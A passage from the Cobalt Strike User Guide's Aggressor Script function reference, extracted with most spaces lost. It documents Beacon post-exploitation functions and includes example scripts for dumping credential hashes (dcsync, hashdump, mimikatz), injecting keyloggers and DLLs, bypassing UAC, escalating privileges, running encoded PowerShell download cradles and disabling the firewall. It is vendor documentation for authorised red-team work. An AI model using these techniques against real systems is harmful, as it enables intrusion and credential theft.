bargue_remove($1, "%COMSPEC%"); base64_decode Unwrapabase64-encodedstring Arguments $1-thestringtodecode Returns Theargumentprocessedbyabase64decoder CobaltStrikeUserGuide www.fortra.com page:269
AggressorScript/Functions Example println(base64_decode(base64_encode("this is a test"))); base64_encode Base64encodeastring Arguments $1-thestringtoencode Returns Theargumentprocessedbyabase64encoder Example println(base64_encode("this is a test")); bblockdlls Launchchildprocesseswithbinarysignaturepolicythatblocksnon-MicrosoftDLLsfrom loadingintheprocessspace. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-trueorfalse;blocknon-MicrosoftDLLsinchildprocess Note ThisattributeisavailableinWindows10only. Example on beacon_initial { binput($1, "blockdlls start"); CobaltStrikeUserGuide www.fortra.com page:270
AggressorScript/Functions bblockdlls($1, true); } bbrowser GeneratethebeaconbrowserGUIcomponent.ShowsonlyBeacons. Returns ThebeaconbrowserGUIobject(ajavax.swing.JComponent) Example addVisualization("Beacon Browser", bbrowser()); Seealso &showVisualization bbrowserpivot StartaBrowserPivot Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDtoinjectthebrowserpivotagentinto. $3-thearchitectureofthetargetPID(x86|x64) Example bbrowserpivot($1, 1234, "x86"); bbrowserpivot_stop StopaBrowserPivot Arguments CobaltStrikeUserGuide www.fortra.com page:271
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example bbrowserpivot_stop($1); bbypassuac REMOVED Removed in Cobalt Strike 4.0. bcancel Cancelafiledownload Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefiletocancelorawildcard. Example item "&Cancel Downloads" { bcancel($1, "*"); } bcd AskaBeacontochangeit'scurrentworkingdirectory. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefoldertochangeto. Example
create a command to change to the user's home directory
alias home { CobaltStrikeUserGuide www.fortra.com page:272
AggressorScript/Functions $home = "c:\users\" . binfo($1, "user"); bcd($1, $home); } bcheckin AskaBeacontocheckin.Thisisbasicallyano-opforBeacon. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example item "&Checkin" { binput($1, "checkin"); bcheckin($1); } bclear Thisisthe"oops"command.Itclearsthequeuedtasksforthespecifiedbeacon. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example bclear($1); bconnect AskBeacon(orSSHsession)toconnecttoaBeaconpeeroveraTCPsocket Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargettoconnectto CobaltStrikeUserGuide www.fortra.com page:273
AggressorScript/Functions $3-(optional)theporttouse.Defaultprofileportisusedotherwise. Note Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener configuration. Example bconnect($1, "DC"); bcovertvpn AskBeacontodeployaCovertVPNclient. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theCovertVPNinterfacetodeploy $3-theIPaddressoftheinterface[ontarget]tobridgeinto $4-(optional)theMACaddressoftheCovertVPNinterface Example bcovertvpn($1, "phear0", "172.16.48.18"); bcp AskBeacontocopyafileorfolder. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefileorfoldertocopy $3-thedestination CobaltStrikeUserGuide www.fortra.com page:274
AggressorScript/Functions Example bcp($1, "evil.exe", "\\target\C$\evil.exe"); bdata GetmetadataforaBeaconsession. Arguments $1-theidforthebeacontopullmetadatafor Returns AdictionaryobjectwithmetadataabouttheBeaconsession. Example println(bdata("1234")); bdcsync Usemimikatz'sdcsynccommandtopullauser'spasswordhashfromadomaincontroller.This functionrequiresadomainadministratortrustrelationship. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-fullyqualifiednameofthedomain $3-(optional)DOMAIN\usertopullhashesfor $4-(optional)thePIDtoinjectthedcsynccommandintoor$null $5-(optional)thearchitectureofthetargetPID(x86|x64)or$null Note CobaltStrikeUserGuide www.fortra.com page:275
AggressorScript/Functions If$3isleftout,dcsyncwilldumpalldomainhashes. Examples Spawnatemporaryprocess
dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\Administrator");
dump all accounts
bdcsync($1, "PLAYLAND.testlab"); Injectintothespecifiedprocess
dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\Administrator", 1234, "x64");
dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64"); bdesktop StartaVNCsession. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example item "&Desktop (VNC)" { bdesktop($1); } bdllinject InjectaReflectiveDLLintoaprocess. Arguments CobaltStrikeUserGuide www.fortra.com page:276
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDtoinjecttheDLLinto $3-thelocalpathtotheReflectiveDLL Example bdllinject($1, 1234, script_resource("test.dll")); bdllload CallLoadLibrary()inaremoteprocesswiththespecifiedDLL. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargetprocessPID $3-theon-targetpathtoaDLL Note TheDLLmustbethesamearchitectureasthetargetprocess. Example bdllload($1, 1234, "c:\windows\mystuff.dll"); bdllspawn SpawnaReflectiveDLLasaBeaconpost-exploitationjob. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelocalpathtotheReflectiveDLL $3-aparametertopasstotheDLL CobaltStrikeUserGuide www.fortra.com page:277
AggressorScript/Functions $4-ashortdescriptionofthispostexploitationjob(showsupinjobsoutput) $5-true/false;useimpersonatedtokenwhenrunningthispost-exjob? $6-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Notes l Thisfunctionwillspawnanx86processiftheReflectiveDLLisanx86DLL.Likewise,if theReflectiveDLLisanx64DLL,thisfunctionwillspawnanx64process. l Awell-behavedReflectiveDLLfollowstheserules: o ReceivesaparameterviathereservedDllMainparameterwhentheDLL_ PROCESS_ATTACHreasonisspecified. o PrintsmessagestoSTDOUT o Callsfflush(stdout)toflushSTDOUT o CallsExitProcess(0)whendone.Thiskillsthespawnedprocesstohostthe capability. Example(ReflectiveDll.c) ThisexampleisbasedonStephenFewer'sReflectiveDLLInjectionProject: BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) { BOOL bReturnValue = TRUE; switch( dwReason ) { case DLL_QUERY_HMODULE: if( lpReserved != NULL ) *(HMODULE )lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; / print some output to the operator */ if (lpReserved != NULL) { printf("Hello from test.dll. Parameter is '%s'\n", (char )lpReserved); } else { printf("Hello from test.dll. There is no parameter\n"); } / flush STDOUT */ CobaltStrikeUserGuide www.fortra.com page:278
AggressorScript/Functions fflush(stdout); /* we're done, so let's exit */ ExitProcess(0); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; } Example(AggressorScript) alias hello { bdllspawn($1, script_resource("reflective_dll.dll"), $2, "test dll", 5000, false); } bdownload AskaBeacontodownloadafile Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefiletorequest Example bdownload($1, "c:\sysprep.inf"); bdrives AskBeacontolistthedrivesonthecompromisedsystem Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. CobaltStrikeUserGuide www.fortra.com page:279
AggressorScript/Functions Example item "&Drives" { binput($1, "drives"); bdrives($1); } beacon_command_describe DescribeaBeaconcommand. Returns AstringdescriptionoftheBeaconcommand. Arguments $1-thecommand Example println(beacon_command_describe("ls")); beacon_command_detail GetthehelpinformationforaBeaconcommand. Returns AstringwithhelpfulinformationaboutaBeaconcommand. Arguments $1-thecommand Example println(beacon_command_detail("ls")); CobaltStrikeUserGuide www.fortra.com page:280
AggressorScript/Functions beacon_command_register RegisterhelpinformationforaBeaconcommand. Arguments $1-thecommand $2-theshortdescriptionofthecommand $3-thelong-formhelpforthecommand. Example alis echo { blog($1, "You typed: " . substr($1, 5)); } beacon_command_register( "echo", "echo text to beacon log", "Synopsis: echo [arguments]\n\nLog arguments to the beacon console"); beacon_commands GetalistofBeaconcommands. Returns AnarrayofBeaconcommands. Example printAll(beacon_commands()); beacon_data GetmetadataforaBeaconsession. Arguments CobaltStrikeUserGuide www.fortra.com page:281
AggressorScript/Functions $1-theidforthebeacontopullmetadatafor Returns AdictionaryobjectwithmetadataabouttheBeaconsession. Example println(beacon_data("1234")); beacon_elevator_describe DescribeaBeaconcommandelevatorexploit Returns AstringdescriptionoftheBeaconcommandelevator Arguments $1-theexploit Example println(beacon_elevator_describe("uac-token-duplication")); SeeAlso &beacon_elevator_register,&beacon_elevators,&belevate_command beacon_elevator_register RegisteraBeaconcommandelevatorwithCobaltStrike.Thisaddsanoptiontotherunasadmin command. Arguments $1-theexploitshortname $2-adescriptionoftheexploit CobaltStrikeUserGuide www.fortra.com page:282
AggressorScript/Functions $3-thefunctionthatimplementstheexploit($1istheBeaconID,$2thecommandand arguments) Example
Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
Sourced from Empire:
https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc sub schtasks_elevator { local('$handle $script $oneliner $command');
acknowledge this command
btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");
read in the script
$handle = openf(getFileProper(script_resource("modules"), "Invoke- EnvBypass.ps1")); $script = readb($handle, -1); closef($handle);
host the script in Beacon
$oneliner = beacon_host_script($1, $script);
base64 encode the command
$command = transform($2, "powershell-base64");
run the specified command via this exploit.
bpowerpick!($1, "Invoke-EnvBypass -Command " $+ $command $+ "", $oneliner); } beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator); SeeAlso &beacon_elevator_describe,&beacon_elevators,&belevate_command beacon_elevators GetalistofcommandelevatorexploitsregisteredwithCobaltStrike. Returns CobaltStrikeUserGuide www.fortra.com page:283
AggressorScript/Functions AnarrayofBeaconcommandelevators Example printAll(beacon_elevators()); Seealso &beacon_elevator_describe,&beacon_elevator_register,&belevate_command beacon_execute_job Runacommandandreportitsoutputtotheuser. Arguments $1-theBeaconID $2-thecommandtorun(environmentvariablesareresolved) $3-thecommandarguments(environmentvariablesarenotresolved). $4-flagsthatchangehowthejobislaunched(e.g.,1=disableWOW64filesystemredirection) Notes l Thestring$2and$3arecombinedas-isintoacommandline.Makesureyoubegin$3 withaspace! l Thisisthemechanism CobaltStrikeusesforitsshellandpowershellcommands. Example alias shell { local('$args'); $args = substr($0, 6); btask($1, "Tasked beacon to run: $args", "T1059"); beacon_execute_job($1, "%COMSPEC%", " /C $args", 0); } beacon_exploit_describe CobaltStrikeUserGuide www.fortra.com page:284
AggressorScript/Functions DescribeaBeaconexploit Returns AstringdescriptionoftheBeaconexploit Arguments $1-theexploit Example println(beacon_exploit_describe("ms14-058")); SeeAlso &beacon_exploit_register,&beacon_exploits,&belevate beacon_exploit_register RegisteraBeaconprivilegeescalationexploitwithCobaltStrike.Thisaddsanoptiontothe elevatecommand. Arguments $1-theexploitshortname $2-adescriptionoftheexploit $3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthelistener) Example
Integrate windows/local/ms16_016_webdav from Metasploit
https://github.com/rapid7/metasploit-
framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb sub ms16_016_exploit { local('$stager');
check if we're on an x64 system and error out.
CobaltStrikeUserGuide www.fortra.com page:285
AggressorScript/Functions if (-is64 $1) { berror($1, "ms16-016 exploit is x86 only"); return; }
acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");
generate our shellcode
$stager = payload($2, "x86");
spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016- 0051.x86.dll"), $stager, "ms16-016", 5000);
link to our payload if it's a TCP or SMB Beacon
beacon_link($1, $null, $2); } beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit); SeeAlso &beacon_exploit_describe,&beacon_exploits,&belevate beacon_exploits GetalistofprivilegeescalationexploitsregisteredwithCobaltStrike. Returns AnarrayofBeaconexploits. Example printAll(beacon_exploits()); Seealso &beacon_exploit_describe,&beacon_exploit_register,&belevate CobaltStrikeUserGuide www.fortra.com page:286
AggressorScript/Functions beacon_host_imported_script LocallyhostapreviouslyimportedPowerShellscriptwithinBeaconandreturnashortscript thatwilldownloadandinvokethisscript. Arguments $1-theidoftheBeacontohostthisscriptwith. Returns AshortPowerShellscripttodownloadandevaluatethepreviouslyscriptwhenrun.Howthis one-linerisusedisuptoyou! Example alias powershell { local('$args $cradle $runme $cmd');
$0 is the entire command with no parsing.
$args = substr($0, 11);
generate the download cradle (if one exists) for an imported PowerShell
script $cradle = beacon_host_imported_script($1);
encode our download cradle AND cmdlet+args we want to run
$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
Build up our entire command line.
$cmd = " -nop -exec bypass -EncodedCommand " $+ $runme $+ "";
task Beacon to run all of this.
btask($1, "Tasked beacon to run: $args", "T1086"); beacon_execute_job($1, "powershell", $cmd, 1); } beacon_host_script LocallyhostaPowerShellscriptwithinBeaconandreturnashortscriptthatwilldownloadand invokethisscript.Thisfunctionisawaytorunlargescriptswhenthereareconstraintsonthe lengthofyourPowerShellone-liner. CobaltStrikeUserGuide www.fortra.com page:287
AggressorScript/Functions Arguments $1-theidoftheBeacontohostthisscriptwith. $2-thescriptdatatohost. Returns AshortPowerShellscripttodownloadandevaluatethescriptwhenrun.Howthisone-lineris usedisuptoyou! Example alias test { local('$script $hosted'); $script = "2 + 2"; $hosted = beacon_host_script($1, $script); binput($1, "powerpick $hosted"); bpowerpick($1, $hosted); } beacon_ids GettheIDofallBeaconscallingbacktothisCobaltStriketeamserver. Returns AnarrayofbeaconIDs Example foreach $bid (beacon_ids()) { println("Bid: $bid"); } beacon_info GetinformationfromaBeaconsession'smetadata. Arguments CobaltStrikeUserGuide www.fortra.com page:288
AggressorScript/Functions $1-theidforthebeacontopullmetadatafor $2-thekeytoextract Returns Astringwiththerequestedinformation. Example println("User is: " . beacon_info("1234", "user")); println("PID is: " . beacon_info("1234", "pid")); beacon_inline_execute ExecuteaBeaconObjectFile Arguments $1-theidfortheBeacon $2-astringcontainingtheBOFfile $3-theentrypointtocall $4-packedargumentstopasstotheBOFfile $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Note TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on page 171. Example(hello.c) /*
- Compile with:
- x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
- i686-w64-mingw32-gcc -c hello.c -o hello.x86.o */ CobaltStrikeUserGuide www.fortra.com page:289
AggressorScript/Functions #include "windows.h" #include "stdio.h" #include "tlhelp32.h" #include "beacon.h" void demo(char * args, int length) { datap parser; char * str_arg; int num_arg; BeaconDataParse(&parser, args, length); str_arg = BeaconDataExtract(&parser, NULL); num_arg = BeaconDataInt(&parser); BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_ arg); } Example(hello.cna) alias hello { local('$barch $handle $data $args');
figure out the arch of this session
$barch = barch($1);
read in the right BOF file
$handle = openf(script_resource("hello. $+ $barch $+ .o")); $data = readb($handle, -1); closef($handle);
pack our arguments
$args = bof_pack($1, "zi", "Hello World", 1234);
announce what we're doing
btask($1, "Running Hello BOF");
execute it.
beacon_inline_execute($1, $data, "demo", $args); } SeeAlso &bof_pack CobaltStrikeUserGuide www.fortra.com page:290
AggressorScript/Functions beacon_link ThisfunctionlinkstoanSMBorTCPlistener.IfthespecifiedlistenerisnotanSMBorTCP listener,thisfunctiondoesnothing. Arguments $1-theidofthebeacontolinkthrough $2-thetargethosttolinkto.Use$nullforlocalhost. $3-thelistenertolink Example
smartlink [target] [listener name]
alias smartlink { beacon_link($1, $2, $3); } beacon_remote_exec_method_describe DescribeaBeaconremoteexecutemethod Returns AstringdescriptionoftheBeaconremoteexecutemethod. Arguments $1-themethod Example println(beacon_remote_exec_method_describe("wmi")); Seealso &beacon_remote_exec_method_register,&beacon_remote_exec_methods,&bremote_exec CobaltStrikeUserGuide www.fortra.com page:291
AggressorScript/Functions beacon_remote_exec_method_register RegisteraBeaconremoteexecutemethodwithCobaltStrike.Thisaddsanoptionforusewith theremote-execcommand. Arguments $1-themethodshortname $2-adescriptionofthemethod $3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe command+args) SeeAlso &beacon_remote_exec_method_describe,&beacon_remote_exec_methods,&bremote_exec beacon_remote_exec_methods GetalistofremoteexecutemethodsregisteredwithCobaltStrike. Returns Anarrayofremoteexecmodules. Example printAll(beacon_remote_exec_methods()); Seealso &beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&bremote_ exec beacon_remote_exploit_arch GetthearchinfoforthisBeaconlateralmovementoption. CobaltStrikeUserGuide www.fortra.com page:292
AggressorScript/Functions Arguments $1-theexploit Returns x86orx64 Example println(beacon_remote_exploit_arch("psexec")); SeeAlso &beacon_remote_exploit_register,&beacon_remote_exploits,&bjump beacon_remote_exploit_describe DescribeaBeaconlateralmovementoption. Returns AstringdescriptionoftheBeaconlateralmovementoption. Arguments $1-theexploit Example println(beacon_remote_exploit_describe("psexec")); SeeAlso &beacon_remote_exploit_register,&beacon_remote_exploits,&bjump beacon_remote_exploit_register CobaltStrikeUserGuide www.fortra.com page:293
AggressorScript/Functions RegisteraBeaconlateralmovementoptionwithCobaltStrike.Thisfunctionextendsthejump command. Arguments $1-theexploitshortname $2-thearchassociatedwiththisattack(e.g.,x86,x64) $3-adescriptionoftheexploit $4-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe listener) Seealso &beacon_remote_exploit_describe,&beacon_remote_exploits,&bjump beacon_remote_exploits GetalistoflateralmovementoptionsregisteredwithCobaltStrike. Returns Anarrayoflateralmovementoptionnames. Example printAll(beacon_remote_exploits()); Seealso &beacon_remote_exploit_describe,&beacon_remote_exploit_register,&bjump beacon_remove RemoveaBeaconfromthedisplay. Arguments CobaltStrikeUserGuide www.fortra.com page:294
AggressorScript/Functions $1-theidforthebeacontoremove beacon_stage_pipe Thisfunctionhandlesthestagingprocessforabindpipestager.Thisisanoptionalstagerfor lateralmovement.Youcanstageanyx86payload/listenerthroughthisstager.Use&stager_ bind_pipetogeneratethisstager. Arguments $1-theidofthebeacontostagethrough $2-thetargethost $3-thelistenername $4-thearchitectureofthepayloadtostage.x86istheonlyoptionrightnow. Example
step 1. generate our stager
$stager = stager_bind_pipe("my listener");
step 2. do something to run our stager
step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener"); beacon_stage_tcp ThisfunctionhandlesthestagingprocessforabindTCPstager.Thisisthepreferredstagerfor localhost-onlystaging.Youcanstageanypayload/listenerthroughthisstager.Use&stager_ bind_tcptogeneratethisstager. Arguments $1-theidofthebeacontostagethrough $2-reserved;use$nullfornow. CobaltStrikeUserGuide www.fortra.com page:295
AggressorScript/Functions $3-theporttostageto $4-thelistenername $5-thearchitectureofthepayloadtostage(x86,x64) Example
step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
step 2. do something to run our stager
step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener"); beacons GetinformationaboutallBeaconscallingbacktothisCobaltStriketeamserver. Returns Anarrayofdictionaryobjectswithinformationabouteachbeacon. Example foreach $beacon (beacons()) { println("Bid: " . $beacon['id'] . " is " . $beacon['name']); } belevate AskBeacontospawnanelevatedsessionwitharegisteredtechnique. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theexploittofire CobaltStrikeUserGuide www.fortra.com page:296
AggressorScript/Functions $3-thelistenertotarget. Example item "&Elevate 31337" { openPayloadHelper(lambda({ binput($bids, "elevate ms14-058 $1"); belevate($bids, "ms14-058", $1); }, $bids => $1)); } Seealso &beacon_exploit_describe,&beacon_exploit_register,&beacon_exploits belevate_command AskBeacontorunacommandinahigh-integritycontext Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-themodule/commandelevatortouse $3-thecommandanditsarguments. Example
disable the firewall
alias shieldsdn { belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off"); } Seealso &beacon_elevator_describe,&beacon_elevator_register,&beacon_elevators berror CobaltStrikeUserGuide www.fortra.com page:297
AggressorScript/Functions PublishanerrormessagetotheBeacontranscript Arguments $1-theidforthebeacontopostto $2-thetexttopost Example alias donotrun { berror($1, "You should never run this command!"); } bexecute AskBeacontoexecuteacommand[withoutashell].Thisprovidesnooutputtotheuser. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandandargumentstorun Example bexecute($1, "notepad.exe"); bexecute_assembly Spawnsalocal.NETexecutableassemblyasaBeaconpost-exploitationjob. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelocalpathtothe.NETexecutableassembly $3-parameterstopasstotheassembly CobaltStrikeUserGuide www.fortra.com page:298
AggressorScript/Functions $4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto 4"patch-rule"rulescanbespecified(spacedelimited). $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap "patch-rule" syntax (comma delimited): [library],[function],[offset],[hex- patch-value] library -1-260characters function -1-256characters offset -0-65535(Theoffsetfromthestartoftheexecutablefunction) hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex pairs). Notes l Thiscommandacceptsavalid.NETexecutableandcallsitsentrypoint. l Thispost-exploitationjobinheritsBeacon'sthreadtoken. l Compileyourcustom .NETprogramswitha.NET3.5compilerforcompatibilitywith systemsthatdon'thave.NET4.0andlater. Example alias myutil { bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 "arg 3""); } bexit AskaBeacontoexit. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example item "&Die" { binput($1, "exit"); CobaltStrikeUserGuide www.fortra.com page:299
AggressorScript/Functions bexit($1); } bgetprivs AttemptstoenablethespecifiedprivilegeinyourBeaconsession. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-acomma-separatedlistofprivilegestoenable.See: https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx Example alias debug { bgetprivs($1, "SeDebugPriv"); } bgetsystem AskBeacontoattempttogettheSYSTEMtoken. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example item "Get &SYSTEM" { binput($1, "getsystem"); bgetsystem($1); } bgetuid AskBeacontoprinttheUserIDofthecurrenttoken Arguments CobaltStrikeUserGuide www.fortra.com page:300
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. bgetuid($1); bhashdump AskBeacontodumplocalaccountpasswordhashes.Ifinjectingintoapidthatprocessrequires administratorprivileges. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2 -thePIDtoinjectthehashdumpdllintoor$null. $3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null. $4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap. Example Spawnatemporaryprocess item "Dump &Hashes" { binput($1, "hashdump"); bhashdump($1); } Injectintothespecifiedprocess) bhashdump($1, 1234, "x64"); bind BindakeyboardshortcuttoanAggressorScriptfunction.Thisisanalternatetothebind keyword. Arguments CobaltStrikeUserGuide www.fortra.com page:301
AggressorScript/Functions $1-thekeyboardshortcut $2-acallbackfunction.Calledwhentheeventhappens. Example
bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.
bind("Ctrl+Left", { previousTab(); }); bind("Ctrl+Right", { nextTab(); }); Seealso &unbind binfo GetinformationfromaBeaconsession'smetadata. Arguments $1-theidforthebeacontopullmetadatafor $2-thekeytoextract Returns Astringwiththerequestedinformation. Example println("User is: " . binfo("1234", "user")); println("PID is: " . binfo("1234", "pid")); binline_execute CobaltStrikeUserGuide www.fortra.com page:302
AggressorScript/Functions ExecuteaBeaconObjectFile.Thisisthesameasusingtheinline-executecommandinBeacon. Arguments $1-theidfortheBeacon $2-thepathtotheBOFfile $3-thestringargumenttopasstotheBOFfile $4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Notes Thisfunctionsfollowsthebehaviorofinline-executeintheBeaconconsole.Thestring argumentwillbezero-terminated,convertedtothetargetencoding,andpassedasanargument totheBOF'sgofunction.ToexecuteaBOF,withmorecontrol,use&beacon_inline_execute TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on page 171. binput ReportacommandwasruntotheBeaconconsoleandlogs.Scriptsthatexecutecommands fortheuser(e.g.,events,popupmenus)shouldusethisfunctiontoassureoperatorattribution ofautomatedactionsinBeacon'slogs. Arguments $1-theidforthebeacontopostto $2-thetexttopost Example
indicate the user ran the ls command
binput($1, "ls"); bipconfig TaskaBeacontolistnetworkinterfaces. CobaltStrikeUserGuide www.fortra.com page:303
AggressorScript/Functions Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-callbackfunctionwiththeipconfigresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Example alias ipconfig { bipconfig($1, { blog($1, "Network information is:\n $+ $2"); }); } bjobkill AskBeacontokillarunningpost-exploitationjob Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thejobID. Example bjobkill($1, 0); bjobs AskBeacontolistrunningpost-exploitationjobs. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example bjobs($1); CobaltStrikeUserGuide www.fortra.com page:304
AggressorScript/Functions bjump AskBeacontospawnasessiononaremotetarget. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetechniquetouse $3-theremotetarget $4-thelistenertospawn Example
winrm [target] [listener]
alias winrm { bjump($1, "winrm", $2, $3); } Seealso &beacon_remote_exploit_describe,&beacon_remote_exploit_register,&beacon_remote_exploits bkerberos_ccache_use AskbeacontoinjectaUNIXkerberosccachefileintotheuser'skerberostray Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelocalpaththeccachefile Example alias kerberos_ccache_use { bkerberos_ccache_use($1, $2); } CobaltStrikeUserGuide www.fortra.com page:305
AggressorScript/Functions bkerberos_ticket_purge Askbeacontopurgeticketsfromtheuser'skerberostray Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example alias kerberos_ticket_purge { bkerberos_ticket_purge($1); } bkerberos_ticket_use Askbeacontoinjectamimikatzkirbifileintotheuser'skerberostray Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelocalpaththekirbifile Example alias kerberos_ticket_use { bkerberos_ticket_use($1, $2); } bkeylogger Injectsakeystrokeloggerintoaprocess. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-(optional)thePIDtoinjectthekeystrokeloggerintoor$null. $3-(optional)thearchitectureofthetargetPID(x86|x64)or$null. CobaltStrikeUserGuide www.fortra.com page:306
AggressorScript/Functions Example Spawnatemporaryprocess bkeylogger($1); Injectintothespecifiedprocess bkeylogger($1, 1234, "x64"); bkill AskBeacontokillaprocess Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDtokill Example bkill($1, 1234); blink AskBeacontolinktoahostoveranamedpipe Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargettolinkto $3-(optional)thepipenametouse.ThedefaultpipenameintheMalleableC2profileisthe defaultotherwise. Note CobaltStrikeUserGuide www.fortra.com page:307
AggressorScript/Functions Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener configuration. Example blink($1, "DC"); blog PublishesanoutputmessagetotheBeacontranscript. Arguments $1-theidforthebeacontopostto $2-thetexttopost Example alias demo { blog($1, "I am output for the blog function"); } blog2 PublishesanoutputmessagetotheBeacontranscript.Thisfunctionhasanalternateformat from&blog Arguments $1-theidforthebeacontopostto $2-thetexttopost Example alias demo2 { blog2($1, "I am output for the blog2 function"); } CobaltStrikeUserGuide www.fortra.com page:308
AggressorScript/Functions bloginuser AskBeacontocreateatokenfromthespecifiedcredentials.Thisisthemake_tokencommand. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thedomainoftheuser $3-theuser'susername $4-theuser'spassword Example
make a token for a user with an empty password
alias make_token_empty { local('$domain $user'); ($domain, $user) = split("\\", $2); bloginuser($1, $domain, $user, ""); } blogonpasswords AskBeacontodumpin-memorycredentialswithmimikatz.Thisfunctionrequiresadministrator privileges. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2 -(optional)thePIDtoinjectthelogonpasswordscommandintoor$null $3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null Example Spawnatemporaryprocess CobaltStrikeUserGuide www.fortra.com page:309
